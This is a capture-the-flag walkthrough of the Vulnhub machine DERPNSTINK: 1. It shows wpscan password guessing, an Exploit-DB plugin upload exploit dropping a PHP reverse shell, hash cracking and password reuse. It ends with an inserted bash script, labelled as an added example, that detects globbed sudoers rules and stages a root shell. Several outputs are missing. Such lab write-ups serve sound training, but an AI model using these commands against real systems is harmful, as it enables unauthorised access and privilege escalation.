Vulnhub - DERPNSTINK: 1
Mr. Derp and Uncle Stinky are two system administrators who are starting their own company, DerpNStink. Instead of hiring qualified professionals to build up their IT landscape, they decided to hack together their own system which is almost ready to go live…
This box is on the NetSecFocus Admin list of OSCP-like machines. It’s DERPNSTINK: 1 from vulnhub. It’s got a Southpark theme, although it’s not overpowering (which I really appreciate) and I haven’t seen the episode so I don’t get the reference.
This box has FTP, SSH and HTTP on the standard ports (21, 22 and 80).
FTP does not allow anonymous login. Moving on…
robots.txt gives two disallowed entries: /php and /temporary. So we have a hint that the server is running PHP. The /php directory gives a 403, and the /temporary directory suggests we try harder!
The page source on the webroot refers to /webnotes/info.txt, which says
@stinky, make sure to update your hosts file with local dns so the new derpnstink blog can be reached before it goes live
So maybe we have a username. Going back out to webnotes, we get:
[stinky@DeRPnStiNK /var/www/html ]$ whois derpnstink.local Domain Name: derpnstink.local
And some other similar stuff - so we definitely have a user called stinky and a domain called derpnstink.local. I add it to /etc/hosts.
Gobuster on /php turns up phpMyAdmin. That’s interesting, but we’ll come back to it. We also find weblog in the webroot, which is the blog the earlier note referred to. It’s running WordPress, so let’s try wpscan:
root@kali:/opt/vulnhub/derpnstink# wpscan -e --url http://derpnstink.local/weblog
This turns up two users: unclestinky and admin. A password attack:
root@kali:/opt/vulnhub/derpnstink# wpscan --url http://derpnstink.local/weblog -U 'unclestinky,admin' -P /usr/share/seclists/Passwords/probable-v2-top12000.txt
quickly yields admin:admin, but nothing for unclestinky.
Logging in, our ‘admin’ user is not actually an administrator.
wpscan also reveals a plugin, Slideshow Gallery 1.4.6, which has an authenticated arbitrary file upload vulnerability (Exploit-DB 34681). The admin:admin account is enough for it. I mirror the Python script from searchsploit and run it:
root@kali:/opt/vulnhub/derpnstink# python 34681.py -t http://derpnstink.local/weblog -u admin -p admin -f sh33l.php
Where sh33l.php is the pentestmonkey PHP reverse shell. It’s found at
And gives back a shell as www-data.
On the box
Enumeration with linpeas suggests the box probably should be vulnerable to multiple kernel exploits but I try a few quickly and they fail.
It also gives us the credentials for mysql:
This looks like it is probably a dead end, but we try it in phpMyAdmin and it works. We can grab the hash for unclestinky from the wp_users table:
I crack this in Hashcat on my Windows host machine (WordPress stores phpass hashes, which are Hashcat mode 400):
The same password is reused for the local stinky account, so with this we can su to stinky.
Enumerating stinky we can find an SSH private key:
Once we copy the key to our attacking machine and chmod 600 it, we can SSH in as stinky and leave the reverse shell behind.
More enumeration reveals a pcap file; might be interesting?
Digging through this, we can find a password for the mrderp user:
And with that, we can su as mrderp.
The final privesc to root is perhaps the easiest: any binary under /home/mrderp/binaries/ whose name starts with derpy can be run as root via sudo. We already knew this from a file stored on the server in /support called troubleshooting.txt:
On one particular machine I often need to run sudo commands every now and then. I am fine with entering password on sudo in most of the cases.
However I don’t want to specify each command to allow
How can I exclude these commands from password protection to sudo?
Thank you for contacting the Client Support team. This message is to confirm that we have resolved and closed your ticket.
Please contact the Client Support team at https://pastebin.com/RzK9WfGw if you have any further questions or issues.
Thank you for using our product.
Visiting https://pastebin.com/RzK9WfGw we find this:
mrderp ALL=(ALL) /home/mrderp/binaries/derpy*
Let’s confirm that now:
I haven’t encountered this exact scenario before. sudo matches the requested command path against that glob, so any file in the directory whose name starts with derpy is accepted, whatever it actually is; let’s try making a copy of bash.
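The wildcard primitive above, as an added example that is not part of the original writeup or the box author's material: a small check that flags globbed command specs in sudo -l style output, and the staging step that turns such a rule into a root shell. The sudo -l text is a constructed sample (not captured from the box), and the derpyshell name and the stage_payload helper are assumptions of mine.

```shell
#!/usr/bin/env bash
# Added example for this writeup; not code from the original post or the box author.
# Two pieces: a check that flags sudo rules containing shell globs in "sudo -l"
# style output, and the payload step that turns such a rule into a root shell.

# Constructed sample in the shape of "sudo -l" output (assumed, not captured
# from the box); the first spec mirrors the pastebin sudoers line.
SUDO_L_SAMPLE='User mrderp may run the following commands on DeRPnStiNK:
    (ALL) /home/mrderp/binaries/derpy*
    (root) NOPASSWD: /usr/bin/apt-get update'

# Print each permitted command spec that contains a glob character (* ? [).
# sudo matches the command path against such a spec with fnmatch-style globbing,
# so every one of these is a candidate for dropping in an attacker-owned binary.
find_wildcard_rules() {
  printf '%s\n' "$1" | awk '
    /^[ \t]*\(/ {
      sub(/^[ \t]*\([^)]*\)[ \t]*/, "")   # strip the "(ALL)" runas part
      sub(/^NOPASSWD:[ \t]*/, "")         # strip an optional NOPASSWD: tag
      if ($0 ~ /[*?]/ || index($0, "[") > 0) print $0
    }'
}

# Stage the payload: a copy of bash whose path matches the glob. The directory
# is created if it does not already exist. Prints the path to run with sudo.
stage_payload() {
  local dir="$1" shell
  shell=$(command -v bash || command -v sh)
  mkdir -p "$dir"
  cp "$shell" "$dir/derpyshell"
  chmod 755 "$dir/derpyshell"
  printf '%s\n' "$dir/derpyshell"
}

# On the box, as mrderp (the rule is not NOPASSWD, so sudo prompts for mrderp's password):
#   payload=$(stage_payload /home/mrderp/binaries)
#   sudo "$payload"        # sudo runs it with uid 0, so this is a root shell
```

Any name works as long as it begins with derpy, and because sudo runs the binary with real and effective uid 0 no -p flag is needed on the copied bash. The check is the part worth keeping: a globbed command spec in sudoers is almost always exploitable by whoever owns the directory the glob points into.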
And that was the end of derpnstink. Quite a few steps involved, and it was pretty good - thumbs up Bryan Smith.